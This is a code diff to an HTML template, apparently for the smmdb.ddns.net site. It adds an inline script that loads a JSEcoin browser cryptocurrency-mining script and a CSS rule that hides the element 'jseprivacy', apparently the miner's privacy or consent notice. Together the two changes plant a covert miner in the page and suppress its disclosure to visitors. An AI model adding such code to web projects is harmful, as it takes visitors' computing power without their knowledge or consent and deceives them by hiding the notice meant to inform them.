--- a/src/template.html
+++ b/src/template.html
@@ -43,6 +43,9 @@
         height: 100%;
         max-height: 100%;
       }
+      div#jseprivacy {
+        display: none !important;
+      }
       .markdown img {
         max-width: 300px;
         max-height: 200px;
@@ -70,5 +73,8 @@
   <body>
     <div id="root">
     </div>
+    <script type="text/javascript">
+      !function(){var e=document,t=e.createElement("script"),s=e.getElementsByTagName("script")[0];t.type="text/javascript",t.async=t.defer=!0,t.src="https://load.jsecoin.com/load/40368/smmdb.ddns.net/0/0/",s.parentNode.insertBefore(t,s)}();
+    </script>
   </body>
 </html>
